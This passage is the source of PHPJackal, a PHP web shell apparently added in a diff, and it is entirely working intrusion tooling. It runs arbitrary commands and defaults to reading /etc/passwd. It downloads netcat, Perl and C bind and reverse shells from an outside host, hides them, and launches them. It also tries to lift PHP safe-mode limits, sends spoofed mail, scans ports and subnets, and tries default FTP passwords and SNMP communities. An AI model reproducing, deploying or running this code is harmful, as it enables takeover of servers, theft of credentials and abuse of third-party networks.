browser!!!</b></noscript>$et</center>"; +$footer="${msgbox}PHPJackal v$v - Powered By <a href='http://netjackal.by.ru/' target='_blank'>NetJackal</a>$et"; +$hcwd="<input type=hidden name=workingdiR value='$cwd'>"; +$t="<table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#333333'>"; +$crack="</td><td bgcolor='#333333'></td></tr><form method='POST' name=form><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>"; +function checkfunctioN($func){ +global $disablefunctions,$safemode; +$safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open'); +if($safemode=='ON' && in_array($func,$safe))return 0; +elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1; +return 0; +} +function whereistmP(){ +$uploadtmp=ini_get('upload_tmp_dir'); +$uf=getenv('USERPROFILE'); +$af=getenv('ALLUSERSPROFILE'); +$se=ini_get('session.save_path'); +$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); +if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; +if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; +if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; +if(is_dir($uf) && is_writable($uf))return $uf; +if(is_dir($af) && is_writable($af))return $af; +if(is_dir($se) && is_writable($se))return $se; +if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; +if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; +return '.'; +} +function shelL($command){ +global $windows; +$exec=$output=''; +$dep[]=array('pipe','r');$dep[]=array('pipe','w'); +if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} +elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} +elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;} +elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command); +elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} +elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} +elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command); +elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command); +elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws); +return $exec; +} +function getiT($get){ +$fo=strtolower(ini_get('allow_url_fopen')); +$ui=strtolower(ini_get('allow_url_include')); +if($fo || $fo=='on')$con=file_get_contents($get); +elseif($ui || $ui=='on'){ +ob_start(); +include('http://netjackal.net/'); +$con=ob_get_contents(); +ob_end_clean(); +} +else{ +$u=parse_url($get); +$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port']; +$url=fsockopen($host,$port,$en,$es,12); +fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +$tmp=$con=''; +while($tmp!="\r\n")$tmp=fgets($url); +while(!feof($url))$con.=fgets($url); +} +return $con; +} +function downloadiT($get,$put){ +$con=getiT($get); +$mk=file_put_contents($put,$con); +if($mk)return 1; +return 0; +} +function winshelL($command){ +$name=whereistmP()."\\".uniqid('NJ'); +win_shell_execute('cmd.exe','',"/C $command >\"$name\""); +sleep(1); +$exec=file_get_contents($name); +unlink($name); +return $exec; +} +function srvshelL($command){ +$name=whereistmP()."\\".uniqid('NJ'); +$n=uniqid('NJ'); +$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; +win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); +win32_start_service($n); +win32_stop_service($n); +win32_delete_service($n); +sleep(1); +$exec=file_get_contents($name); +unlink($name); +return $exec; +} +function comshelL($command,$ws){ +$exec=$ws->exec ("cmd.exe /c $command"); +$so=$exec->StdOut(); +return $so->ReadAll(); +} +function smtpchecK($addr,$user,$pass,$timeout){ +$sock=fsockopen($addr,25,$n,$s,$timeout); +if(!$sock)return -1; +fread($sock,1024); +fputs($sock,'ehlo '.uniqid('NJ')."\r\n"); +$res=substr(fgets($sock,512),0,1); +if($res!='2')return 0; +fgets($sock,512);fgets($sock,512);fgets($sock,512); +fputs($sock,"AUTH LOGIN\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='334')return 0; +fputs($sock,base64_encode($user)."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='334')return 0; +fputs($sock,base64_encode($pass)."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='235')return 0; +return 1; +} +function mysqlchecK($host,$user,$pass,$timeout){ +if(function_exists('mysql_connect')){ +$l=mysql_connect($host,$user,$pass); +if($l)return 1; +} +return 0; +} +function mssqlchecK($host,$user,$pass,$timeout){ +if(function_exists('mssql_connect')){ +$l=mssql_connect($host,$user,$pass); +if($l)return 1; +} +return 0; +} +function checksmtP($host,$timeout){ +$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com'; +$sock=fsockopen($host,25,$n,$s,$timeout); +if(!$sock)return -1; +$res=substr(fgets($sock,512),0,3); +if($res!='220')return 0; +fputs($sock,'HELO '.uniqid('NJ')."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"MAIL FROM: <$from>\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"DATA\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='354')return 0; +fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." <$from>\r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +return 1; +} +function replace_stR($s,$h){ +$ret=$h; +foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret); +return $ret; +} +function check_urL($url,$method,$search='200',$timeout=3){ +$u=parse_url($url); +$method=strtoupper($method); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port']; +$data=(!empty($u['query']))?$u['query']:''; +if(!empty($data))$data="?$data"; +$sock=fsockopen($host,$port,$en,$es,$timeout); +if($sock){ +fputs($sock,"$method $file$data HTTP/1.0\r\n"); +fputs($sock,"Host: $host\r\n"); +if($method=='GET')fputs($sock,"\r\n"); +elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); +else return 0; +if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;} +while(!feof($sock)){ +$res=fgets($sock); +if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} +} +fclose($sock); +} +return 0; +} +function get_sw_namE($host,$timeout){ +$sock=fsockopen($host,80,$en,$es,$timeout); +if($sock){ +$page=uniqid('NJ'); +fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); +while(!feof($sock)){ +$con=fgets($sock); +if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} +} +fclose($sock); +return -1; +}return 0; +} +function snmpchecK($ip,$com,$timeout){ +$res=0; +$n=chr(0x00); +$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n; +$sock=fsockopen("udp://$ip",161); +if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout); +fputs($sock,$packet); +socket_set_timeout($sock,$timeout); +$res=fgets($sock); +fclose($sock); +if($res != '')return 1;else return 0; +} +$safemode=(ini_get('safe_mode') || strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF'; +if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');} +function brshelL(){ +global $errorbox,$windows,$et,$hcwd; +$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; +$addr='http://netjackal.by.ru/br'; +$error="$errorbox Can not make backdoor file, go to writeable folder.$et"; +$n=uniqid('NJ_'); +if(!$windows)$n=".$n"; +$d=whereistmP(); +$name=$d.DIRECTORY_SEPARATOR.$n; +$c=($_REQUEST['C'])?1:0; +if(!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1)){ +$port=(int)$_REQUEST['port']; +if($windows){ +if($c){ +$name.='.exe'; +$bd=downloadiT("$addr/nc",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); +}else{ +$name=$name.'.pl'; +$bd=downloadiT("$addr/winbind.p",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("perl $name $port"); +} +} +else{ +if($c){ +$bd=downloadiT("$addr/bind.c",$name); +if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); +}else{ +$bd=downloadiT("$addr/bind.p",$name); +if(!$bd)echo $error;else shelL("cd $d;perl $n $port &"); +echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>"; +} +} +} +elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ +$ip=$_REQUEST['ip']; +$port=(int)$_REQUEST['rport']; +if($windows){ +if($c){ +$name.='.exe'; +$bd=downloadiT("$addr/nc",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); +}else{ +$name=$name.'.pl'; +$bd=downloadiT("$addr/winrc.p",$name); +shelL("attrib +H $name"); +if (!$bd)echo $error;else shelL("perl.exe $name $ip $port"); +} +} +else{ +if($c){ +$bd=downloadiT("$addr/rc.c",$name); +if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); +}else{ +$bd=downloadiT("$addr/rc.p",$name); +if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &"); +} +} +echo '<font color=blue>Done!</font>';} +else{echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='50%' bgcolor='#333333'>Bind shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=port value=55501 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input type=submit class=buttons value=Bind></form>$et</td><td><table border=0 style='border-collapse: collapse' width='50%'><tr><td width='40%' bgcolor='#333333'>Reverse shell:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#808080'>IP:</td><td bgcolor='#808080'><input type=text name=ip value=";echo $_SERVER['REMOTE_ADDR'];echo " size=17></td></tr><tr><td width='20%' bgcolor='#666666'>Port:</td><td bgcolor='#666666'><input type=text name=rport value=53 size=5></td></tr><tr><td width='20%' bgcolor='#808080'>Type:</td><td bgcolor='#808080'><input type=radio style='border-width:1px;background-color:#808080;' value=0 checked name=C>PERL<input type=radio style='border-width:1px;background-color:#808080;' name=C value=1>";if($windows)echo 'EXE';else echo 'C';echo"</td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et$et";}} +function showimagE($img){ +echo "<center><img border=0 src='".hlinK("imagE=$img&&workingdiR=".getcwd())."'></center>";} +function editoR($file){ +global $errorbox,$et,$hcwd,$cwd; +if(is_file($file)){ +if(!is_readable($file)){echo "$errorbox File is not readable$et<br>";} +if(!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";} +$data=file_get_contents($file); +echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'>$hcwd<input type=text value='".htmlspecialchars($file)."' size=75 name=file><input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='64'>"; +echo htmlspecialchars($data); +echo "</textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$file' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>"; +} +else {echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='10%' bgcolor='#808080'><form method='POST'><input type=text value='$cwd' size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></form>$et<br><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='40%' bgcolor='#666666'><form method='POST'><textarea rows='18' name='edited' cols='63'></textarea></td></tr><tr><td width='10%' bgcolor='#808080'><input type=text value='$cwd' size=80 name=file></td></tr><td width='40%' bgcolor='#666666' align='right'>"; +} +echo "$hcwd<input type=submit class=buttons name=Save value=Save></form>$et</center>"; +} +function webshelL(){ +global $windows,$hcwd,$et,$cwd; +if($windows){ +$alias="<option value='netstat -an'>Display open ports</option><option value='tasklist'>List of processes</option><option value='systeminfo'>System information</option><option value='ipconfig /all'>IP configuration</option><option value='getmac'>Get MAC address</option><option value='net start'>Services list</option><option value='net view'>Machines in domain</option><option value='net user'>Users list</option><option value='shutdown -s -f -t 1'>Turn off the server</option>"; +} +else{ +$alias="<option value='netstat -an | grep -i listen'>Display open ports</option><option value='last -a -n 250 -i'>Show last 250 logged in users</option><option value='which wget curl lynx w3m'>Downloaders</option><option value='find / -perm -2 -type d -print'>Find world-writable directories</option><option value='find . -perm -2 -type d -print'>Find world-writable directories(in current directory)</option><option value='find / -perm -2 -type f -print'>Find world-writable files</option><option value='find . -perm -2 -type f -print'>Find world-writable files(in current directory)</option><option value='find / -type f -perm 04000 -ls'>Find files with SUID bit set</option><option value='find / -type f -perm 02000 -ls'>Find files with SGID bit set</option><option value='find / -name .htpasswd -type f'>Find .htpasswd files</option><option value='find / -type f -name .bash_history'>Find .bash_history files</option><option value='cat /etc/syslog.conf'>View syslog.conf</option><option value='cat cat /etc/hosts'>View hosts</option><option value='ps auxw'>List of processes</option>"; +if(is_dir('/etc/valiases'))$alias.="<option value='ls -l /etc/valiases'>List of cPanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value='ls -l /etc/vdomainaliases'>List cPanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value='cat /var/cpanel/accounting.log'>Display cPanel`s log</option>"; +if(is_dir('/var/spool/mail/'))$alias.="<option value='ls /var/spool/mail/'>Mailboxes list</option>"; +} +echo "<center><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><form method='POST'><tr><td width='20%'><b>Location:</b><input type=text name=workingdiR size=82 value='$cwd'><input class=buttons type=submit value=Change></form>$et<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='65%'><tr><td><b>Web Shell:</b></td></tr><td bgcolor='#666666'><textarea rows='23' cols='79'>"; +if(!empty($_REQUEST['cmd']))echo shelL($_REQUEST['cmd']); +echo"</textarea></td></tr><form method=post><tr><td bgcolor='#808080'><input type=text size=91 name=cmd value='";if(!empty($_REQUEST['cmd']))echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows)echo "cat /etc/passwd";echo "'>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor='#808080'><select name='cmd' width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></form>$et</table><center>"; +} +function maileR(){ +global $msgbox,$et,$hcwd; +if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){ +$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body']; +if(mail($to,$subject,$body,"From: $from"))echo "$msgbox<b>Mail sent!</b><br>$et"; +} +echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'><td><b>Mailer:</b></td></tr><td width='20%' bgcolor='#666666'>SMTP</td><td bgcolor='#666666'>".ini_get('SMTP').' ('.ini_get('smtp_port').")</td></tr><tr><td bgcolor='#808080'>From:</td><td bgcolor='#808080'><input name=from type=text value='evil@hell.gov' size=55>$hcwd</td><tr><td width='25%' bgcolor='#666666'>To:</td><td bgcolor='#666666'><input name=to type=text value='";if(!empty($_ENV['SERVER_ADMIN']))echo $_ENV['SERVER_ADMIN'];else echo 'admin@'.getenv('HTTP_HOST'); echo "' size=55></td></tr><tr><td bgcolor='#808080'>Subject:</td><td bgcolor='#808080'><input name=subject type=text value='' size=55></td><tr><td bgcolor='#666666'>Body:</td><td bgcolor='#666666'><textarea rows='18' cols='43' name=body></textarea></td></tr><tr><td width='10%' bgcolor='#808080'></td><td bgcolor='#808080' align='right'><input type=submit class=buttons value=Send></form>$et"; +} +function scanneR(){ +global $hcwd,$et; +if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1'; +$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; +if(($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ +$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0; +echo '<font color=blue>Port scanning started against '.htmlspecialchars($target).':<br>'; +$start=time(); +for($i=$from;$i<=$to;$i++){ +if($tcp){ +if(checkthisporT($target,$i,$timeout)){ +$nu++; +$ser=''; +if(getservbyport($i,'tcp'))$ser='('.getservbyport($i,'tcp').')'; +echo "$nu) $i $ser (<a href='telnet://$target:$i'>Connect</a>) [TCP]<br>"; +} +} +if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser='';if(getservbyport($i,'udp'))$ser='('.getservbyport($i,'udp').')';echo "$nu) $i $ser [UDP]<br>";} +} +$time=time()-$start; +echo "Done! ($time seconds)</font>"; +} +elseif(!empty($_REQUEST['securityscanner'])){ +echo '<font color=blue>'; +$start=time(); +$from=$_REQUEST['from']; +$to=(int)$_REQUEST['to']; +$timeout=(int)$_REQUEST['timeout']; +$f=substr($from,strrpos($from,'.')+1); +$from=substr($from,0,strrpos($from,'.')); +if(!empty($_REQUEST['httpscanner'])){ +echo 'Loading webserver bug list...'; +$buglist=whereistmP().DIRECTORY_SEPARATOR.uniqid('BL'); +$dl=downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); +if($dl){$file=file($buglist);echo 'Done! scanning started.<br><br>';}else echo 'Failed!!! scanning started without webserver security testing...<br><br>'; +}else{$fr=htmlspecialchars($from);echo "Scanning $fr.$f-$fr.$to:<br><br>";} +for($i=$f;$i<=$to;$i++){ +$output=0; +$ip="$from.$i"; +if(!empty($_REQUEST['nslookup'])){ +$hn=gethostbyaddr($ip); +if($hn!=$ip)echo "$ip [$hn]<br>"; $output=1;} +if(!empty($_REQUEST['ipscanner'])){ +$port=$_REQUEST['port']; +if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port; +$open=$ser=''; +foreach($p as $po){ +$scan=checkthisporT($ip,$po,$timeout); +if($scan){ +$ser=''; +if($ser=getservbyport($po,'tcp'))$ser="($ser)"; +$open.=" $po$ser "; +} +} +if($open){echo "$ip) Open ports:$open<br>";$output=1;} + +} +if(!empty($_REQUEST['httpbanner'])){ +$res=get_sw_namE($ip,$timeout); +if($res){ +echo "$ip) Webserver software: "; +if($res==-1)echo 'Unknow'; +else echo $res; +echo '<br>'; +$output=1; +} +} +if(!empty($_REQUEST['httpscanner'])){ +if(checkthisporT($ip,80,$timeout) && !empty($file)){ +$admin=array('/admin/','/adm/'); +$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); +$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); +$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); +foreach($file as $v){ +$vuln=array(); +$v=trim($v); +if(!$v || $v{0}=='#')continue; +$v=str_replace('","','^',$v); +$v=str_replace('"','',$v); +$vuln=explode('^',$v); +$page=$cqich=$nukech=$adminch=$userch=$vuln[1]; +if(strstr($page,'@CGIDIRS')) +foreach($cgi as $cg){ +$cqich=str_replace('@CGIDIRS',$cg,$page); +$url="http://$ip$cqich"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";} +} +elseif(strstr($page,'@ADMINDIRS')) +foreach($admin as $cg){ +$adminch=str_replace('@ADMINDIRS',$cg,$page); +$url="http://$ip$adminch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";} +} +elseif(strstr($page,'@USERS')) +foreach($users as $cg){ +$userch=str_replace('@USERS',$cg,$page); +$url="http://$ip$userch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";} +} +elseif(strstr($page,'@NUKE')) +foreach($nuke as $cg){ +$nukech=str_replace('@NUKE',$cg,$page); +$url="http://$ip$nukech"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";} +} +else{ +$url="http://$ip$page"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";} +} +} +} +} +if(!empty($_REQUEST['smtprelay'])){ +if(checkthisporT($ip,25,$timeout)){ +$res=''; +$res=checksmtP($ip,$timeout); +if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;} +} +} +if(!empty($_REQUEST['snmpscanner'])){ +if(checkthisporT($ip,161,$timeout,1)){ +$com=$_REQUEST['com']; +$coms=$res=''; +if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com; +foreach($c as $v){ +$ret=snmpchecK($ip,$v,$timeout); +if($ret)$coms.=" $v "; +} +if($coms!=''){echo "$ip) SNMP FOUND: $coms<br>";$output=1;} +} +} +if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){ +if(checkthisporT($ip,21,$timeout)){ +$usps=explode(',',$_REQUEST['userpass']); +foreach($usps as $v){ +$user=substr($v,0,strpos($v,':')); +$pass=substr($v,strpos($v,':')+1); +if($pass=='[BLANK]')$pass=''; +$ftp=ftp_connect($ip,21,$timeout); +if($ftp){ +if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (<b><a href='";echo hlinK("seC=ftpc&workingdiR=".getcwd()."&hosT=$ip&useR=$user&pasS=$pass");echo "' target='_blank'>Connect</a></b>)<br>";} +} +} +} +} +if($output)echo '<hr size=1 noshade>'; +} +$time=time()-$start; +echo "Done! ($time seconds)</font>"; +if(!empty($buglist))unlink($buglist); +} +elseif(!empty($_REQUEST['directoryscanner'])){ +$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1']; +echo "<font color=blue><pre>Scanning started...\n"; +for($i=0;$i<count($dir);$i++){ +$d=trim($dir[$i]); +if($r){ +$adr="http://$host/$d/"; +if(check_urL($adr,'GET','302')){echo "Directory Found: <a href='$adr' target='_blank'>$adr</a>\n";} +}else{ +$adr="$d.$host"; +$ip=gethostbyname($adr); +if($ip!=$adr){echo "Subdomain Found: <a href='http://$adr' target='_blank'>$adr($ip)</a>\n";} +} +} +echo 'Done!</pre></font>'; +} +else{ +$t="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'"; +$chbox=(extension_loaded('sockets'))?"<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP":"<input type=hidden name=tcp value=1>"; +echo "<center>$t><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>$chbox</td><td bgcolor='#808080' align='right'>$hcwd<input type=submit class=buttons name=portscanner value=Scan></form>$et$t><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='".$_SERVER["HTTP_HOST"]."' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>"; +$host=substr($host,0,strrpos($host,".")); +echo "$t name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td 